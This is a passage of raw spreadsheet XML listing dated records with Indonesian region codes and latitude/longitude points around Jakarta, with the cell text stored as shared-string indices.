      <c r="Y3030" t="str">
        <f t="shared" si="47"/>
        <v>-6.20646,106.82186</v>
      </c>
    </row>
    <row r="3031" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3031">
        <v>247735</v>
      </c>
      <c r="B3031" s="1">
        <v>44243</v>
      </c>
      <c r="C3031" s="2">
        <v>0.15980324074074073</v>
      </c>
      <c r="D3031" t="s">
        <v>22</v>
      </c>
      <c r="E3031" t="s">
        <v>23</v>
      </c>
      <c r="F3031" t="s">
        <v>10254</v>
      </c>
      <c r="H3031" t="s">
        <v>7978</v>
      </c>
      <c r="I3031" t="s">
        <v>7979</v>
      </c>
      <c r="J3031" t="s">
        <v>9554</v>
      </c>
      <c r="L3031" t="s">
        <v>9555</v>
      </c>
      <c r="M3031">
        <v>3172080002</v>
      </c>
      <c r="N3031">
        <v>3172080</v>
      </c>
      <c r="O3031">
        <v>3172</v>
      </c>
      <c r="P3031">
        <v>31</v>
      </c>
      <c r="Q3031" t="s">
        <v>2804</v>
      </c>
      <c r="R3031" t="s">
        <v>141</v>
      </c>
      <c r="S3031" t="s">
        <v>49</v>
      </c>
      <c r="T3031" t="s">
        <v>33</v>
      </c>
      <c r="U3031" s="5">
        <v>10694150</v>
      </c>
      <c r="V3031" s="5" t="s">
        <v>17179</v>
      </c>
      <c r="W3031" s="5">
        <v>-620715</v>
      </c>
      <c r="X3031" t="s">
        <v>20920</v>
      </c>
      <c r="Y3031" t="str">
        <f t="shared" si="47"/>
        <v>-6.20715,106.94150</v>
      </c>
    </row>
    <row r="3032" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3032">
        <v>247740</v>
      </c>
      <c r="B3032" s="1">
        <v>44243</v>
      </c>
      <c r="C3032" s="2">
        <v>0.16138888888888889</v>
      </c>
      <c r="D3032" t="s">
        <v>22</v>
      </c>
      <c r="E3032" t="s">
        <v>23</v>
      </c>
      <c r="F3032" t="s">
        <v>10255</v>
      </c>
      <c r="H3032" t="s">
        <v>26</v>
      </c>
      <c r="I3032" t="s">
        <v>1559</v>
      </c>
      <c r="J3032" t="s">
        <v>9554</v>
      </c>
      <c r="L3032" t="s">
        <v>250</v>
      </c>
      <c r="M3032">
        <v>3172080002</v>
      </c>
      <c r="N3032">
        <v>3172080</v>
      </c>
      <c r="O3032">
        <v>3172</v>
      </c>
      <c r="P3032">
        <v>31</v>
      </c>
      <c r="Q3032" t="s">
        <v>2804</v>
      </c>
      <c r="R3032" t="s">
        <v>141</v>
      </c>
      <c r="S3032" t="s">
        <v>49</v>
      </c>
      <c r="T3032" t="s">
        <v>33</v>
      </c>
      <c r="U3032" s="5">
        <v>10694005</v>
      </c>
      <c r="V3032" s="5" t="s">
        <v>17180</v>
      </c>
      <c r="W3032" s="5">
        <v>-620598</v>
      </c>
      <c r="X3032" t="s">
        <v>20921</v>
      </c>
      <c r="Y3032" t="str">
        <f t="shared" si="47"/>
        <v>-6.20598,106.94005</v>
      </c>
    </row>
    <row r="3033" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3033">
        <v>247745</v>
      </c>
      <c r="B3033" s="1">
        <v>44243</v>
      </c>
      <c r="C3033" s="2">
        <v>0.16575231481481481</v>
      </c>
      <c r="D3033" t="s">
        <v>22</v>
      </c>
      <c r="E3033" t="s">
        <v>23</v>
      </c>
      <c r="F3033" t="s">
        <v>10256</v>
      </c>
      <c r="H3033" t="s">
        <v>26</v>
      </c>
      <c r="I3033" t="s">
        <v>2016</v>
      </c>
      <c r="J3033" t="s">
        <v>9554</v>
      </c>
      <c r="L3033" t="s">
        <v>250</v>
      </c>
      <c r="M3033">
        <v>3172080002</v>
      </c>
      <c r="N3033">
        <v>3172080</v>
      </c>
      <c r="O3033">
        <v>3172</v>
      </c>
      <c r="P3033">
        <v>31</v>
      </c>
      <c r="Q3033" t="s">
        <v>2804</v>
      </c>
      <c r="R3033" t="s">
        <v>141</v>
      </c>
      <c r="S3033" t="s">
        <v>49</v>
      </c>
      <c r="T3033" t="s">
        <v>33</v>
      </c>
      <c r="U3033" s="5">
        <v>10693947</v>
      </c>
      <c r="V3033" s="5" t="s">
        <v>17181</v>
      </c>
      <c r="W3033" s="5">
        <v>-620640</v>
      </c>
      <c r="X3033" t="s">
        <v>20922</v>
      </c>
      <c r="Y3033" t="str">
        <f t="shared" si="47"/>
        <v>-6.20640,106.93947</v>
      </c>
    </row>
    <row r="3034" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3034">
        <v>247750</v>
      </c>
      <c r="B3034" s="1">
        <v>44243</v>
      </c>
      <c r="C3034" s="2">
        <v>0.15398148148148147</v>
      </c>
      <c r="D3034" t="s">
        <v>85</v>
      </c>
      <c r="E3034" t="s">
        <v>23</v>
      </c>
      <c r="F3034" t="s">
        <v>10257</v>
      </c>
      <c r="G3034" t="s">
        <v>10258</v>
      </c>
      <c r="H3034" t="s">
        <v>26</v>
      </c>
      <c r="J3034" t="s">
        <v>581</v>
      </c>
      <c r="K3034" t="s">
        <v>10259</v>
      </c>
      <c r="L3034" t="s">
        <v>10260</v>
      </c>
      <c r="M3034">
        <v>3174020007</v>
      </c>
      <c r="N3034">
        <v>3174020</v>
      </c>
      <c r="O3034">
        <v>3174</v>
      </c>
      <c r="P3034">
        <v>31</v>
      </c>
      <c r="Q3034" t="s">
        <v>95</v>
      </c>
      <c r="R3034" t="s">
        <v>31</v>
      </c>
      <c r="S3034" t="s">
        <v>32</v>
      </c>
      <c r="T3034" t="s">
        <v>33</v>
      </c>
      <c r="U3034" s="5">
        <v>10675906</v>
      </c>
      <c r="V3034" s="5" t="s">
        <v>17182</v>
      </c>
      <c r="W3034" s="5">
        <v>-617069</v>
      </c>
      <c r="X3034" t="s">
        <v>20923</v>
      </c>
      <c r="Y3034" t="str">
        <f t="shared" si="47"/>
        <v>-6.17069,106.75906</v>
      </c>
    </row>
    <row r="3035" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3035">
        <v>247762</v>
      </c>
      <c r="B3035" s="1">
        <v>44243</v>
      </c>
      <c r="C3035" s="2">
        <v>0.17777777777777778</v>
      </c>
      <c r="D3035" t="s">
        <v>2648</v>
      </c>
      <c r="E3035" t="s">
        <v>23</v>
      </c>
      <c r="G3035" t="s">
        <v>10261</v>
      </c>
      <c r="H3035" t="s">
        <v>26</v>
      </c>
      <c r="J3035" t="s">
        <v>10262</v>
      </c>
      <c r="L3035" t="s">
        <v>10263</v>
      </c>
      <c r="M3035">
        <v>3174020004</v>
      </c>
      <c r="N3035">
        <v>3174020</v>
      </c>
      <c r="O3035">
        <v>3174</v>
      </c>
      <c r="P3035">
        <v>31</v>
      </c>
      <c r="Q3035" t="s">
        <v>31</v>
      </c>
      <c r="R3035" t="s">
        <v>31</v>
      </c>
      <c r="S3035" t="s">
        <v>32</v>
      </c>
      <c r="T3035" t="s">
        <v>33</v>
      </c>
      <c r="U3035" s="5">
        <v>10677420</v>
      </c>
      <c r="V3035" s="5" t="s">
        <v>17183</v>
      </c>
      <c r="W3035" s="5">
        <v>-618926</v>
      </c>
      <c r="X3035" t="s">
        <v>20924</v>
      </c>
      <c r="Y3035" t="str">
        <f t="shared" si="47"/>
        <v>-6.18926,106.77420</v>
      </c>
    </row>
    <row r="3036" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3036">
        <v>247766</v>
      </c>
      <c r="B3036" s="1">
        <v>44243</v>
      </c>
      <c r="C3036" s="2">
        <v>0.14444444444444446</v>
      </c>
      <c r="D3036" t="s">
        <v>2648</v>
      </c>
      <c r="E3036" t="s">
        <v>23</v>
      </c>
      <c r="G3036" t="s">
        <v>10264</v>
      </c>
      <c r="H3036" t="s">
        <v>26</v>
      </c>
      <c r="J3036" t="s">
        <v>10265</v>
      </c>
      <c r="L3036" t="s">
        <v>10266</v>
      </c>
      <c r="M3036">
        <v>3174080002</v>
      </c>
      <c r="N3036">
        <v>3174080</v>
      </c>
      <c r="O3036">
        <v>3174</v>
      </c>
      <c r="P3036">
        <v>31</v>
      </c>
      <c r="Q3036" t="s">
        <v>5723</v>
      </c>
      <c r="R3036" t="s">
        <v>695</v>
      </c>
      <c r="S3036" t="s">
        <v>32</v>
      </c>
      <c r="T3036" t="s">
        <v>33</v>
      </c>
      <c r="U3036" s="5">
        <v>10670207</v>
      </c>
      <c r="V3036" s="5" t="s">
        <v>15445</v>
      </c>
      <c r="W3036" s="5">
        <v>-615660</v>
      </c>
      <c r="X3036" t="s">
        <v>20925</v>
      </c>
      <c r="Y3036" t="str">
        <f t="shared" si="47"/>
        <v>-6.15660,106.70207</v>
      </c>
    </row>
    <row r="3037" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3037">
        <v>247767</v>
      </c>
      <c r="B3037" s="1">
        <v>44243</v>
      </c>
      <c r="C3037" s="2">
        <v>0.11319444444444444</v>
      </c>
      <c r="D3037" t="s">
        <v>2648</v>
      </c>
      <c r="E3037" t="s">
        <v>23</v>
      </c>
      <c r="G3037" t="s">
        <v>10267</v>
      </c>
      <c r="H3037" t="s">
        <v>26</v>
      </c>
      <c r="J3037" t="s">
        <v>566</v>
      </c>
      <c r="L3037" t="s">
        <v>10268</v>
      </c>
      <c r="M3037">
        <v>3174070005</v>
      </c>
      <c r="N3037">
        <v>3174070</v>
      </c>
      <c r="O3037">
        <v>3174</v>
      </c>
      <c r="P3037">
        <v>31</v>
      </c>
      <c r="Q3037" t="s">
        <v>568</v>
      </c>
      <c r="R3037" t="s">
        <v>84</v>
      </c>
      <c r="S3037" t="s">
        <v>32</v>
      </c>
      <c r="T3037" t="s">
        <v>33</v>
      </c>
      <c r="U3037" s="5">
        <v>10673045</v>
      </c>
      <c r="V3037" s="5" t="s">
        <v>14815</v>
      </c>
      <c r="W3037" s="5">
        <v>-613428</v>
      </c>
      <c r="X3037" t="s">
        <v>20926</v>
      </c>
      <c r="Y3037" t="str">
        <f t="shared" si="47"/>
        <v>-6.13428,106.73045</v>
      </c>
    </row>
    <row r="3038" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3038">
        <v>247768</v>
      </c>
      <c r="B3038" s="1">
        <v>44243</v>
      </c>
      <c r="C3038" s="2">
        <v>9.1666666666666674E-2</v>
      </c>
      <c r="D3038" t="s">
        <v>2648</v>
      </c>
      <c r="E3038" t="s">
        <v>23</v>
      </c>
      <c r="G3038" t="s">
        <v>10269</v>
      </c>
      <c r="H3038" t="s">
        <v>26</v>
      </c>
      <c r="J3038" t="s">
        <v>9569</v>
      </c>
      <c r="L3038" t="s">
        <v>10270</v>
      </c>
      <c r="M3038">
        <v>3175040003</v>
      </c>
      <c r="N3038">
        <v>3175040</v>
      </c>
      <c r="O3038">
        <v>3175</v>
      </c>
      <c r="P3038">
        <v>31</v>
      </c>
      <c r="Q3038" t="s">
        <v>2062</v>
      </c>
      <c r="R3038" t="s">
        <v>2063</v>
      </c>
      <c r="S3038" t="s">
        <v>547</v>
      </c>
      <c r="T3038" t="s">
        <v>33</v>
      </c>
      <c r="U3038" s="5">
        <v>10691070</v>
      </c>
      <c r="V3038" s="5" t="s">
        <v>17184</v>
      </c>
      <c r="W3038" s="5">
        <v>-611948</v>
      </c>
      <c r="X3038" t="s">
        <v>20927</v>
      </c>
      <c r="Y3038" t="str">
        <f t="shared" si="47"/>
        <v>-6.11948,106.91070</v>
      </c>
    </row>
    <row r="3039" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3039">
        <v>247769</v>
      </c>
      <c r="B3039" s="1">
        <v>44243</v>
      </c>
      <c r="C3039" s="2">
        <v>8.0555555555555561E-2</v>
      </c>
      <c r="D3039" t="s">
        <v>2648</v>
      </c>
      <c r="E3039" t="s">
        <v>23</v>
      </c>
      <c r="G3039" t="s">
        <v>10271</v>
      </c>
      <c r="H3039" t="s">
        <v>26</v>
      </c>
      <c r="J3039" t="s">
        <v>8086</v>
      </c>
      <c r="L3039" t="s">
        <v>10272</v>
      </c>
      <c r="M3039">
        <v>3171050005</v>
      </c>
      <c r="N3039">
        <v>3171050</v>
      </c>
      <c r="O3039">
        <v>3171</v>
      </c>
      <c r="P3039">
        <v>31</v>
      </c>
      <c r="Q3039" t="s">
        <v>8057</v>
      </c>
      <c r="R3039" t="s">
        <v>508</v>
      </c>
      <c r="S3039" t="s">
        <v>108</v>
      </c>
      <c r="T3039" t="s">
        <v>33</v>
      </c>
      <c r="U3039" s="5">
        <v>10677419</v>
      </c>
      <c r="V3039" s="5" t="s">
        <v>17185</v>
      </c>
      <c r="W3039" s="5">
        <v>-622875</v>
      </c>
      <c r="X3039" t="s">
        <v>20928</v>
      </c>
      <c r="Y3039" t="str">
        <f t="shared" si="47"/>
        <v>-6.22875,106.77419</v>
      </c>
    </row>
    <row r="3040" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3040">
        <v>247770</v>
      </c>
      <c r="B3040" s="1">
        <v>44243</v>
      </c>
      <c r="C3040" s="2">
        <v>9.0277777777777776E-2</v>
      </c>
      <c r="D3040" t="s">
        <v>2648</v>
      </c>
      <c r="E3040" t="s">
        <v>23</v>
      </c>
      <c r="G3040" t="s">
        <v>10273</v>
      </c>
      <c r="H3040" t="s">
        <v>26</v>
      </c>
      <c r="J3040" t="s">
        <v>10274</v>
      </c>
      <c r="L3040" t="s">
        <v>10275</v>
      </c>
      <c r="M3040">
        <v>3174010002</v>
      </c>
      <c r="N3040">
        <v>3174010</v>
      </c>
      <c r="O3040">
        <v>3174</v>
      </c>
      <c r="P3040">
        <v>31</v>
      </c>
      <c r="Q3040" t="s">
        <v>514</v>
      </c>
      <c r="R3040" t="s">
        <v>69</v>
      </c>
      <c r="S3040" t="s">
        <v>32</v>
      </c>
      <c r="T3040" t="s">
        <v>33</v>
      </c>
      <c r="U3040" s="5">
        <v>10675620</v>
      </c>
      <c r="V3040" s="5" t="s">
        <v>17186</v>
      </c>
      <c r="W3040" s="5">
        <v>-620199</v>
      </c>
      <c r="X3040" t="s">
        <v>20929</v>
      </c>
      <c r="Y3040" t="str">
        <f t="shared" si="47"/>
        <v>-6.20199,106.75620</v>
      </c>
    </row>
    <row r="3041" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3041">
        <v>247810</v>
      </c>
      <c r="B3041" s="1">
        <v>44243</v>
      </c>
      <c r="C3041" s="2">
        <v>0.19842592592592592</v>
      </c>
      <c r="D3041" t="s">
        <v>22</v>
      </c>
      <c r="E3041" t="s">
        <v>23</v>
      </c>
      <c r="F3041" t="s">
        <v>10276</v>
      </c>
      <c r="G3041" t="s">
        <v>10277</v>
      </c>
      <c r="H3041" t="s">
        <v>26</v>
      </c>
      <c r="I3041" t="s">
        <v>886</v>
      </c>
      <c r="J3041" t="s">
        <v>10278</v>
      </c>
      <c r="L3041" t="s">
        <v>10279</v>
      </c>
      <c r="M3041">
        <v>3174080001</v>
      </c>
      <c r="N3041">
        <v>3174080</v>
      </c>
      <c r="O3041">
        <v>3174</v>
      </c>
      <c r="P3041">
        <v>31</v>
      </c>
      <c r="Q3041" t="s">
        <v>694</v>
      </c>
      <c r="R3041" t="s">
        <v>695</v>
      </c>
      <c r="S3041" t="s">
        <v>32</v>
      </c>
      <c r="T3041" t="s">
        <v>33</v>
      </c>
      <c r="U3041" s="5">
        <v>10669638</v>
      </c>
      <c r="V3041" s="5" t="s">
        <v>14591</v>
      </c>
      <c r="W3041" s="5">
        <v>-617272</v>
      </c>
      <c r="X3041" t="s">
        <v>20930</v>
      </c>
      <c r="Y3041" t="str">
        <f t="shared" si="47"/>
        <v>-6.17272,106.69638</v>
      </c>
    </row>
    <row r="3042" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3042">
        <v>247829</v>
      </c>
      <c r="B3042" s="1">
        <v>44243</v>
      </c>
      <c r="C3042" s="2">
        <v>0.20432870370370371</v>
      </c>
      <c r="D3042" t="s">
        <v>22</v>
      </c>
      <c r="E3042" t="s">
        <v>23</v>
      </c>
      <c r="F3042" t="s">
        <v>10280</v>
      </c>
      <c r="G3042" t="s">
        <v>10281</v>
      </c>
      <c r="H3042" t="s">
        <v>26</v>
      </c>
      <c r="I3042" t="s">
        <v>72</v>
      </c>
      <c r="J3042" t="s">
        <v>2627</v>
      </c>
      <c r="L3042" t="s">
        <v>10282</v>
      </c>
      <c r="M3042">
        <v>3275020002</v>
      </c>
      <c r="N3042">
        <v>3275020</v>
      </c>
      <c r="O3042">
        <v>3275</v>
      </c>
      <c r="P3042">
        <v>32</v>
      </c>
      <c r="Q3042" t="s">
        <v>10283</v>
      </c>
      <c r="R3042" t="s">
        <v>828</v>
      </c>
      <c r="S3042" t="s">
        <v>41</v>
      </c>
      <c r="T3042" t="s">
        <v>42</v>
      </c>
      <c r="U3042" s="5">
        <v>10695916</v>
      </c>
      <c r="V3042" s="5" t="s">
        <v>15759</v>
      </c>
      <c r="W3042" s="5">
        <v>-631596</v>
      </c>
      <c r="X3042" t="s">
        <v>20931</v>
      </c>
      <c r="Y3042" t="str">
        <f t="shared" si="47"/>
        <v>-6.31596,106.95916</v>
      </c>
    </row>
    <row r="3043" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3043">
        <v>247839</v>
      </c>
      <c r="B3043" s="1">
        <v>44243</v>
      </c>
      <c r="C3043" s="2">
        <v>0.20606481481481484</v>
      </c>
      <c r="D3043" t="s">
        <v>22</v>
      </c>
      <c r="E3043" t="s">
        <v>23</v>
      </c>
      <c r="F3043" t="s">
        <v>10284</v>
      </c>
      <c r="G3043" t="s">
        <v>10285</v>
      </c>
      <c r="H3043" t="s">
        <v>26</v>
      </c>
      <c r="I3043" t="s">
        <v>517</v>
      </c>
      <c r="J3043" t="s">
        <v>10278</v>
      </c>
      <c r="L3043" t="s">
        <v>10286</v>
      </c>
      <c r="M3043">
        <v>3174080001</v>
      </c>
      <c r="N3043">
        <v>3174080</v>
      </c>
      <c r="O3043">
        <v>3174</v>
      </c>
      <c r="P3043">
        <v>31</v>
      </c>
      <c r="Q3043" t="s">
        <v>694</v>
      </c>
      <c r="R3043" t="s">
        <v>695</v>
      </c>
      <c r="S3043" t="s">
        <v>32</v>
      </c>
      <c r="T3043" t="s">
        <v>33</v>
      </c>
      <c r="U3043" s="5">
        <v>10669457</v>
      </c>
      <c r="V3043" s="5" t="s">
        <v>17187</v>
      </c>
      <c r="W3043" s="5">
        <v>-617180</v>
      </c>
      <c r="X3043" t="s">
        <v>19667</v>
      </c>
      <c r="Y3043" t="str">
        <f t="shared" si="47"/>
        <v>-6.17180,106.69457</v>
      </c>
    </row>
    <row r="3044" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3044">
        <v>247913</v>
      </c>
      <c r="B3044" s="1">
        <v>44243</v>
      </c>
      <c r="C3044" s="2">
        <v>0.23523148148148146</v>
      </c>
      <c r="D3044" t="s">
        <v>22</v>
      </c>
      <c r="E3044" t="s">
        <v>23</v>
      </c>
      <c r="F3044" t="s">
        <v>10287</v>
      </c>
      <c r="G3044" t="s">
        <v>10288</v>
      </c>
      <c r="H3044" t="s">
        <v>26</v>
      </c>
      <c r="I3044" t="s">
        <v>248</v>
      </c>
      <c r="J3044" t="s">
        <v>3135</v>
      </c>
      <c r="L3044" t="s">
        <v>10289</v>
      </c>
      <c r="M3044">
        <v>3671030015</v>
      </c>
      <c r="N3044">
        <v>3671030</v>
      </c>
      <c r="O3044">
        <v>3671</v>
      </c>
      <c r="P3044">
        <v>36</v>
      </c>
      <c r="Q3044" t="s">
        <v>681</v>
      </c>
      <c r="R3044" t="s">
        <v>201</v>
      </c>
      <c r="S3044" t="s">
        <v>201</v>
      </c>
      <c r="T3044" t="s">
        <v>171</v>
      </c>
      <c r="U3044" s="5">
        <v>10664422</v>
      </c>
      <c r="V3044" s="5" t="s">
        <v>17188</v>
      </c>
      <c r="W3044" s="5">
        <v>-618003</v>
      </c>
      <c r="X3044" t="s">
        <v>20932</v>
      </c>
      <c r="Y3044" t="str">
        <f t="shared" si="47"/>
        <v>-6.18003,106.64422</v>
      </c>
    </row>
    <row r="3045" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3045">
        <v>247921</v>
      </c>
      <c r="B3045" s="1">
        <v>44243</v>
      </c>
      <c r="C3045" s="2">
        <v>0.23472222222222219</v>
      </c>
      <c r="D3045" t="s">
        <v>2648</v>
      </c>
      <c r="E3045" t="s">
        <v>23</v>
      </c>
      <c r="G3045" t="s">
        <v>10290</v>
      </c>
      <c r="H3045" t="s">
        <v>26</v>
      </c>
      <c r="I3045" t="s">
        <v>103</v>
      </c>
      <c r="J3045" t="s">
        <v>894</v>
      </c>
      <c r="L3045" t="s">
        <v>10291</v>
      </c>
      <c r="M3045">
        <v>3174020005</v>
      </c>
      <c r="N3045">
        <v>3174020</v>
      </c>
      <c r="O3045">
        <v>3174</v>
      </c>
      <c r="P3045">
        <v>31</v>
      </c>
      <c r="Q3045" t="s">
        <v>30</v>
      </c>
      <c r="R3045" t="s">
        <v>31</v>
      </c>
      <c r="S3045" t="s">
        <v>32</v>
      </c>
      <c r="T3045" t="s">
        <v>33</v>
      </c>
      <c r="U3045" s="5">
        <v>10677159</v>
      </c>
      <c r="V3045" s="5" t="s">
        <v>17189</v>
      </c>
      <c r="W3045" s="5">
        <v>-616664</v>
      </c>
      <c r="X3045" t="s">
        <v>20933</v>
      </c>
      <c r="Y3045" t="str">
        <f t="shared" si="47"/>
        <v>-6.16664,106.77159</v>
      </c>
    </row>
    <row r="3046" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3046">
        <v>248014</v>
      </c>
      <c r="B3046" s="1">
        <v>44243</v>
      </c>
      <c r="C3046" s="2">
        <v>0.27152777777777776</v>
      </c>
      <c r="D3046" t="s">
        <v>2648</v>
      </c>
      <c r="E3046" t="s">
        <v>23</v>
      </c>
      <c r="G3046" t="s">
        <v>10292</v>
      </c>
      <c r="H3046" t="s">
        <v>26</v>
      </c>
      <c r="J3046" t="s">
        <v>10293</v>
      </c>
      <c r="L3046" t="s">
        <v>10294</v>
      </c>
      <c r="M3046">
        <v>3172090001</v>
      </c>
      <c r="N3046">
        <v>3172090</v>
      </c>
      <c r="O3046">
        <v>3172</v>
      </c>
      <c r="P3046">
        <v>31</v>
      </c>
      <c r="Q3046" t="s">
        <v>2681</v>
      </c>
      <c r="R3046" t="s">
        <v>890</v>
      </c>
      <c r="S3046" t="s">
        <v>49</v>
      </c>
      <c r="T3046" t="s">
        <v>33</v>
      </c>
      <c r="U3046" s="5">
        <v>10687703</v>
      </c>
      <c r="V3046" s="5" t="s">
        <v>17190</v>
      </c>
      <c r="W3046" s="5">
        <v>-620555</v>
      </c>
      <c r="X3046" t="s">
        <v>20934</v>
      </c>
      <c r="Y3046" t="str">
        <f t="shared" si="47"/>
        <v>-6.20555,106.87703</v>
      </c>
    </row>
    <row r="3047" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3047">
        <v>248069</v>
      </c>
      <c r="B3047" s="1">
        <v>44243</v>
      </c>
      <c r="C3047" s="2">
        <v>0.28611111111111115</v>
      </c>
      <c r="D3047" t="s">
        <v>2648</v>
      </c>
      <c r="E3047" t="s">
        <v>23</v>
      </c>
      <c r="G3047" t="s">
        <v>10295</v>
      </c>
      <c r="H3047" t="s">
        <v>26</v>
      </c>
      <c r="I3047" t="s">
        <v>103</v>
      </c>
      <c r="J3047" t="s">
        <v>2438</v>
      </c>
      <c r="L3047" t="s">
        <v>10296</v>
      </c>
      <c r="M3047">
        <v>3175050003</v>
      </c>
      <c r="N3047">
        <v>3175050</v>
      </c>
      <c r="O3047">
        <v>3175</v>
      </c>
      <c r="P3047">
        <v>31</v>
      </c>
      <c r="Q3047" t="s">
        <v>1740</v>
      </c>
      <c r="R3047" t="s">
        <v>1013</v>
      </c>
      <c r="S3047" t="s">
        <v>547</v>
      </c>
      <c r="T3047" t="s">
        <v>33</v>
      </c>
      <c r="U3047" s="5">
        <v>10691231</v>
      </c>
      <c r="V3047" s="5" t="s">
        <v>17191</v>
      </c>
      <c r="W3047" s="5">
        <v>-614832</v>
      </c>
      <c r="X3047" t="s">
        <v>19138</v>
      </c>
      <c r="Y3047" t="str">
        <f t="shared" si="47"/>
        <v>-6.14832,106.91231</v>
      </c>
    </row>
    <row r="3048" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3048">
        <v>248105</v>
      </c>
      <c r="B3048" s="1">
        <v>44243</v>
      </c>
      <c r="C3048" s="2">
        <v>0.29743055555555559</v>
      </c>
      <c r="D3048" t="s">
        <v>22</v>
      </c>
      <c r="E3048" t="s">
        <v>23</v>
      </c>
      <c r="F3048" t="s">
        <v>10297</v>
      </c>
      <c r="G3048" t="s">
        <v>10298</v>
      </c>
      <c r="H3048" t="s">
        <v>26</v>
      </c>
      <c r="I3048" t="s">
        <v>137</v>
      </c>
      <c r="J3048" t="s">
        <v>3135</v>
      </c>
      <c r="M3048">
        <v>3671030004</v>
      </c>
      <c r="N3048">
        <v>3671030</v>
      </c>
      <c r="O3048">
        <v>3671</v>
      </c>
      <c r="P3048">
        <v>36</v>
      </c>
      <c r="Q3048" t="s">
        <v>10299</v>
      </c>
      <c r="R3048" t="s">
        <v>201</v>
      </c>
      <c r="S3048" t="s">
        <v>201</v>
      </c>
      <c r="T3048" t="s">
        <v>171</v>
      </c>
      <c r="U3048" s="5">
        <v>10663073</v>
      </c>
      <c r="V3048" s="5" t="s">
        <v>17192</v>
      </c>
      <c r="W3048" s="5">
        <v>-620406</v>
      </c>
      <c r="X3048" t="s">
        <v>20935</v>
      </c>
      <c r="Y3048" t="str">
        <f t="shared" si="47"/>
        <v>-6.20406,106.63073</v>
      </c>
    </row>
    <row r="3049" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3049">
        <v>248159</v>
      </c>
      <c r="B3049" s="1">
        <v>44243</v>
      </c>
      <c r="C3049" s="2">
        <v>0.31031249999999999</v>
      </c>
      <c r="D3049" t="s">
        <v>22</v>
      </c>
      <c r="E3049" t="s">
        <v>23</v>
      </c>
      <c r="F3049" t="s">
        <v>10300</v>
      </c>
      <c r="G3049" t="s">
        <v>10301</v>
      </c>
      <c r="H3049" t="s">
        <v>26</v>
      </c>
      <c r="I3049" t="s">
        <v>523</v>
      </c>
      <c r="J3049" t="s">
        <v>3135</v>
      </c>
      <c r="M3049">
        <v>3671020018</v>
      </c>
      <c r="N3049">
        <v>3671020</v>
      </c>
      <c r="O3049">
        <v>3671</v>
      </c>
      <c r="P3049">
        <v>36</v>
      </c>
      <c r="Q3049" t="s">
        <v>10302</v>
      </c>
      <c r="R3049" t="s">
        <v>274</v>
      </c>
      <c r="S3049" t="s">
        <v>201</v>
      </c>
      <c r="T3049" t="s">
        <v>171</v>
      </c>
      <c r="U3049" s="5">
        <v>10668828</v>
      </c>
      <c r="V3049" s="5" t="s">
        <v>17193</v>
      </c>
      <c r="W3049" s="5">
        <v>-617284</v>
      </c>
      <c r="X3049" t="s">
        <v>19024</v>
      </c>
      <c r="Y3049" t="str">
        <f t="shared" si="47"/>
        <v>-6.17284,106.68828</v>
      </c>
    </row>
    <row r="3050" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3050">
        <v>248172</v>
      </c>
      <c r="B3050" s="1">
        <v>44243</v>
      </c>
      <c r="C3050" s="2">
        <v>0.31452546296296297</v>
      </c>
      <c r="D3050" t="s">
        <v>22</v>
      </c>
      <c r="E3050" t="s">
        <v>23</v>
      </c>
      <c r="F3050" t="s">
        <v>10303</v>
      </c>
      <c r="G3050" t="s">
        <v>10304</v>
      </c>
      <c r="H3050" t="s">
        <v>26</v>
      </c>
      <c r="I3050" t="s">
        <v>1538</v>
      </c>
      <c r="J3050" t="s">
        <v>10305</v>
      </c>
      <c r="L3050" t="s">
        <v>10306</v>
      </c>
      <c r="M3050">
        <v>3174070001</v>
      </c>
      <c r="N3050">
        <v>3174070</v>
      </c>
      <c r="O3050">
        <v>3174</v>
      </c>
      <c r="P3050">
        <v>31</v>
      </c>
      <c r="Q3050" t="s">
        <v>83</v>
      </c>
      <c r="R3050" t="s">
        <v>84</v>
      </c>
      <c r="S3050" t="s">
        <v>32</v>
      </c>
      <c r="T3050" t="s">
        <v>33</v>
      </c>
      <c r="U3050" s="5">
        <v>10670685</v>
      </c>
      <c r="V3050" s="5" t="s">
        <v>17194</v>
      </c>
      <c r="W3050" s="5">
        <v>-617514</v>
      </c>
      <c r="X3050" t="s">
        <v>20936</v>
      </c>
      <c r="Y3050" t="str">
        <f t="shared" si="47"/>
        <v>-6.17514,106.70685</v>
      </c>
    </row>
    <row r="3051" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3051">
        <v>248259</v>
      </c>
      <c r="B3051" s="1">
        <v>44243</v>
      </c>
      <c r="C3051" s="2">
        <v>0.25972222222222224</v>
      </c>
      <c r="D3051" t="s">
        <v>2648</v>
      </c>
      <c r="E3051" t="s">
        <v>23</v>
      </c>
      <c r="G3051" t="s">
        <v>10307</v>
      </c>
      <c r="H3051" t="s">
        <v>26</v>
      </c>
      <c r="J3051" t="s">
        <v>10308</v>
      </c>
      <c r="L3051" t="s">
        <v>10309</v>
      </c>
      <c r="M3051">
        <v>3175040004</v>
      </c>
      <c r="N3051">
        <v>3175040</v>
      </c>
      <c r="O3051">
        <v>3175</v>
      </c>
      <c r="P3051">
        <v>31</v>
      </c>
      <c r="Q3051" t="s">
        <v>10310</v>
      </c>
      <c r="R3051" t="s">
        <v>2063</v>
      </c>
      <c r="S3051" t="s">
        <v>547</v>
      </c>
      <c r="T3051" t="s">
        <v>33</v>
      </c>
      <c r="U3051" s="5">
        <v>10691335</v>
      </c>
      <c r="V3051" s="5" t="s">
        <v>17195</v>
      </c>
      <c r="W3051" s="5">
        <v>-611840</v>
      </c>
      <c r="X3051" t="s">
        <v>20937</v>
      </c>
      <c r="Y3051" t="str">
